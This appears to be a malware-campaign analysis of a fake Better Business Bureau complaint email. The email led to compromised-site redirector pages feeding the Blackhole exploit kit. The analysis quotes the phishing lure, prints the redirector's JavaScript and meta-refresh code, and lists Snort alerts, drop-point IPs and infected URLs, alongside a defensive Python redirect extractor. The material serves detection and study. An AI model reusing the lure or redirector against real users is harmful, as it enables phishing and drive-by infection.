The Better Business Bureau has been filed the above mentioned reclamation from one of your clients in respect of their dealings with you. The detailed description of the consumer's anxiety are available by clicking the link below. Please give attention to this issue and notify us about your mind as soon as possible.
We politely ask you to overview the <LINK>GRIEVANCE REPORT<LINK> to meet on this complaint.
We are looking forward to your prompt response.
Best regards
Tristan Lewis
Dispute Councilor
Better Business Bureau
==============HTML====================
GET /bbb.html HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding:
Host: speedgarage.com.ua
Connection: Keep-Alive
HTTP/1.0 200 OK
Server: nginx/1.1.10
Date: Fri, 07 Jun 2013 17:13:03 GMT
Content-Type: text/html
Content-Length: 738
Last-Modified: Fri, 07 Jun 2013 11:53:09 GMT
Accept-Ranges: bytes
Connection: keep-alive
<html>
<title>BBB is loading...</title>
<script type="text/javascript">
<!--location.replace("http://pnpnews.net/news/readers-sections.php");
//-->
</script>
<noscript>
<meta http-equiv="refresh" content="0; url=http://pnpnews.net/news/readers-sections.php">
</noscript>
</head>
<h1>You will be redirected to process</h1>
<h3>Redirecting to Complain details... Please wait...</h3>
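The redirector above pushes the browser off the compromised host by two routes: location.replace() for browsers running script, and a meta refresh inside noscript for the rest, both pointing at the same pnpnews.net URL. The Python script below is an added example and not code from the original post; it parses a landing page with the standard library's html.parser, extracts both kinds of redirect target, and flags the ones that leave the hosting domain, which is the check a triage analyst wants when a "bbb.html" shows up on an otherwise legitimate site. SAMPLE_HTML is a constructed copy of the response shown above, and the function and class names are my own.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed test input: the redirector served from speedgarage.com.ua/bbb.html,
# copied from the HTTP response quoted in the post.
SAMPLE_HTML = """<html>
<title>BBB is loading...</title>
<script type="text/javascript">
<!--location.replace("http://pnpnews.net/news/readers-sections.php");
//-->
</script>
<noscript>
<meta http-equiv="refresh" content="0; url=http://pnpnews.net/news/readers-sections.php">
</noscript>
</head>
<h1>You will be redirected to process</h1>
<h3>Redirecting to Complain details... Please wait...</h3>
"""


class RedirectExtractor(HTMLParser):
    """Collects redirect targets from <meta http-equiv="refresh"> and inline scripts."""

    # location.replace("..."), location.assign("..."), location = "...", location.href = "..."
    JS_REDIRECT = re.compile(
        r"""(?:(?:window\.|document\.|top\.)?location(?:\.href)?\s*=|location\.(?:replace|assign)\s*\()"""
        r"""\s*["']([^"']+)["']"""
    )
    # "0; url=http://..." -> the URL part, with or without quotes
    META_URL = re.compile(r"url\s*=\s*['\"]?([^'\"\s;]+)", re.IGNORECASE)

    def __init__(self):
        super().__init__()
        self.targets = []        # (method, url) in document order
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "script":
            self._in_script = True
        elif tag == "meta" and attrs.get("http-equiv", "").lower() == "refresh":
            m = self.META_URL.search(attrs.get("content", ""))
            if m:
                self.targets.append(("meta-refresh", m.group(1)))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Script bodies arrive as raw text, so the "<!-- ... //-->" wrapper used by
        # the sample is just part of the data and does not hide the call.
        if self._in_script:
            for m in self.JS_REDIRECT.finditer(data):
                self.targets.append(("javascript", m.group(1)))

    def handle_comment(self, data):
        # Defensive: if a parser build ever reports the script wrapper as a comment
        # event, scan it too; duplicates are removed in extract_redirects().
        for m in self.JS_REDIRECT.finditer(data):
            self.targets.append(("javascript", m.group(1)))


def extract_redirects(html):
    """Return [(method, url), ...] in document order, without duplicates."""
    parser = RedirectExtractor()
    parser.feed(html)
    parser.close()
    seen, out = set(), []
    for target in parser.targets:
        if target not in seen:
            seen.add(target)
            out.append(target)
    return out


def offdomain_redirects(page_host, html):
    """URLs the page sends the browser to that are not on page_host itself."""
    page_host = page_host.lower()
    out = []
    for _, url in extract_redirects(html):
        # relative URLs have no hostname and stay on the serving host
        host = (urlparse(url).hostname or page_host).lower()
        if host != page_host and url not in out:
            out.append(url)
    return out


if __name__ == "__main__":
    for method, url in extract_redirects(SAMPLE_HTML):
        print(f"{method:13s} -> {url}")
    print("off-domain:", offdomain_redirects("speedgarage.com.ua", SAMPLE_HTML))
```

Run against the sample it reports the same target twice, once per mechanism, and lists it as off-domain for speedgarage.com.ua; a page that only redirects within its own host produces an empty off-domain list, which is the usual benign case for a login or locale redirect.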
Exploit Kit: Blackhole
Snort Rules
ET TROJAN Spoofed MSIE 7 User-Agent Likely Ponmocup
ET CURRENT_EVENTS SUSPICIOUS JAR Download by Java UA with non JAR EXT matches various EKs
ET INFO Packed Executable Download
ET CURRENT_EVENTS Blackhole request for Payload
ET CURRENT_EVENTS BlackHole EK JNLP request
ET CURRENT_EVENTS - Possible BlackHole request with decryption Base
ET TROJAN Pony Downloader check-in response STATUS-IMPORT-OK
ET TROJAN Known Trojan Downloader HTTP Library MSIE 5 Win98 seen with ZeuS
ET TROJAN Fareit/Pony Downloader Checkin 2
ET CURRENT_EVENTS DRIVEBY Blackhole - Payload Download - readme.exe
ET CURRENT_EVENTS DRIVEBY Blackhole - Payload Download - contacts.exe
ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (6)
ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (5)
ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (41)
ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (33)
ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (13)
Drop Points:
88.191.130.98:8080
- 8080/tcp open http nginx 1.0.10
- 21/tcp open ftp Pure-FTPd
- 22/tcp open ssh OpenSSH 5.3p1 Debian 3ubuntu7 (protocol 2.0)
- 25/tcp open smtp Postfix smtpd
- 80/tcp open http Apache httpd 2.2.14 ((Ubuntu))
- 8080/tcp open http nginx 1.0.10
- 8090/tcp open http nginx 1.2.6
213.214.74.5:8080
- 8080/tcp open http nginx 1.0.10
- 21/tcp open ftp ProFTPD 1.3.3d
- 22/tcp open ssh OpenSSH 5.8p1 Debian 1ubuntu3 (protocol 2.0)
- 80/tcp open http Apache httpd 2.2.17 ((Ubuntu))
Disk Artifacts of Interest:
exp1.tmp.exe | VirusTotal Detected as: PSW.Generic | Fareit | Zero Access 30/47
exp1.tmp
exp2.tmp
URLs Involved
hxxp://carpenterpricebreaker.com/bbb.html
hxxp://ecotopia.pl/bbb.html
hxxp://gite-cantal-meandres.fr/bbb.html
hxxp://ib-greb.de/bbb.html
hxxp://intelaboratory.com/bbb.html
hxxp://rentbaku.com/bbb.html
hxxp://slavamoskovkin.ru/bbb.html
hxxp://speedgarage.com.ua/bbb.html
hxxp://vmoskalev.ru/bbb.html